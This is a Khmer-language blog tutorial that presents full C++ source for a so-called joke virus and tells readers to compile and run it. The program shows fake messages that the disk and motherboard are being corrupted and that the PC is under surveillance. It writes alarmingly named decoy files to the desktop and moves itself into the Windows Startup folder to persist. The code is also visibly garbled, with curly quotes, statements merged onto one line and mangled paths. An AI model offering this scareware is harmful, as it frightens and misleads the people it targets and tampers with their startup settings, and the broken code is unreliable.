បង្កើតមេរោគ Virus Joke Program ជាមួយ C++


មេរោគកុំព្យូទ័រ ជាកម្មវិធីមួយបែប ដែលមានលទ្ធភាពអាចធ្វើការចម្លង ខ្លួនរបស់វាពី កន្លែងមួយ ទៅកន្លែងមួយផ្សេងទៀតតាមរយៈ File កម្មវិធី អត្ថបទ កុំព្យូទ័រនៅលើ បណ្តាញ និងនៅលើ … អានបន្តរ
ខេធី៤២
សូមបង្ហាញលោកអ្នកនូវកូដរបស់មេរោគម៉្យាងដែលមានឈ្មោះថា Virus Joke Program

 • ចំណងជើង Virus Joke Program
 • អ្នកនិពន្ធ Sohan Vineet Alva
 • អ៊ីម៉ែលអ្នកនិពន្ធ dj_shawn2003 [at] hotmail.com
 • ពណ៌នាពីមេរោគ This is not exactly a virus …. but good enough to fool someone….. and keep him/her beating around the bush
 • ប្រភេទ Virus & Trojans

របៀបបង្កើត

 1. សូមបើកកម្មវិធី  Dev C++
 2. បន្ទាប់សូមសរសេរកូដដូចខាងក្រោម
  #include<iostream.h>
  #include<conio.h>
  #include<dos.h>
  #include<stdio.h>
  #include<process.h>
  #include<graphics.h>
  #include<fstream.h>void ffool(); //FUNCTION WHICH GIVES THE FINAL MESSAGEvoid main()
  {
  clrscr();
  for(int i=0;i<=100;i++)
  { textcolor(YELLOW+BLINK);
  gotoxy(35,12);
  cprintf(“VIRUS LOADING”);
  gotoxy(39,15);
  textcolor(GREEN);
  cout<<i<<“%”;
  delay(75);
  clrscr();
  }
  delay(100);
  clrscr();
  fflush(stdout);
  gotoxy(20,12);
  cout<<” ‘TOURNIQUET’ VIRUS CREATED BY PROCRAETORIAN”;
  gotoxy(20,14);
  cout<<” SAY GOOD BYE TO YOUR PC IN “;
  for(int j=5;j>=0;j–)
  {
  gotoxy(48,14);
  cout<<j<<” SECONDS”;
  delay(1000);
  }
  ofstream f1;
  f1.open(“c:/windows/All Users/desktop/procraetorian.sys”);
  ofstream f3(“c:/windows/All Users/desktop/blast.sys”);
  ofstream a2(“c:/windows/All Users/desktop/mslaugh.exe”);
  ofstream s2(“c:/windows/All Users/desktop/backdoor.sys”);
  ofstream g2(“c:/windows/All Users/desktop/spin32_war.sys”);
  ofstream h2(“c:/windows/All Users/desktop/russpatr.sys”);
  ofstream j2(“c:/windows/All Users/desktop/torr_sys32.sys”);
  ofstream k2(“c:/windows/All Users/desktop/xxx.sys”);
  ofstream l2(“c:/windows/All Users/desktop/i.txt”);
  ofstream sm(“c:/windows/All Users/desktop/am.txt”);
  ofstream d1(“c:/windows/All Users/desktop/your.txt”);
  ofstream d2(“c:/windows/All Users/desktop/worst.txt”);
  ofstream d3(“c:/windows/All Users/desktop/night.txt”);
  ofstream d4(“c:/windows/All Users/desktop/mare.txt”);
  clrscr();
  lowvideo();
  cout<<“ 1.HARD-DISK CORRUPTION
  :”;
  delay(4000);
  cout<<“completed”;
  cout<<“ 2.MOTHER BOARD CORRUPTION
  :”;
  delay(4000);
  cout<<“completed”;
  cout<<“

  3.INSTALLING CYBERBOB.DLL –>WINDOWS/COMMAND
  :”;
  delay(4000);
  cout<<“completed”;
  cout<<“

  PROCRAETORIAN.SYS SUCCESSFULLY PLANTED”;
  delay(3000);
  rename(“VIRUS.EXE”,”C:WINDOWSStart MenuProgramsStartUpVIRUS.EXE”);
  //ffool();
  }
  //*END OF MAIN*//
  //*START OF ffool()*//
  void ffool()
  {
  clrscr();
  int g=DETECT,h;
  initgraph(&g,&h,”\tc\bgi\”);
  cleardevice();
  delay(1000);
  setcolor(2);
  settextstyle(1,0,1);
  delay(1000);
  setbkcolor(BLUE);
  highvideo();
  outtextxy(50,150,”THE PROCRAETORIAN:”);
  delay(1500);
  outtextxy(50,200,”YOUR PC IS NOW UNDER SURVEILANCE BY THE VIRUS
  HOST”);
  outtextxy(50,250,”PEA(C)E BE WITH YOU ! ! !”);
  getch();
  delay(4000);
  closegraph();
  exit(0);
  }

 3. បន្ទាប់មកសូមចុច Execute (Menu) => Compile & Run ឬ Key F9 ដើម្បីដំណើរការ
Advertisements

អំពីម្ចាស់ប្លក គង់ តូ
យើងរស់នៅក្នុងពិភពបច្ចេកវិទ្យា ប្រសិនបើលោកអ្នកគាំទ្រស្នាដៃ ខេធី៤២ សូមចូលទៅកាន់ www.kt42.info

ឆ្លើយ​តប

Fill in your details below or click an icon to log in:

ឡូហ្កូ WordPress.com

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី WordPress.com របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

Google+ photo

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Google+ របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

រូប Twitter

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Twitter របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

រូបថត Facebook

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Facebook របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

w

កំពុង​ភ្ជាប់​ទៅ​កាន់ %s

%d bloggers like this: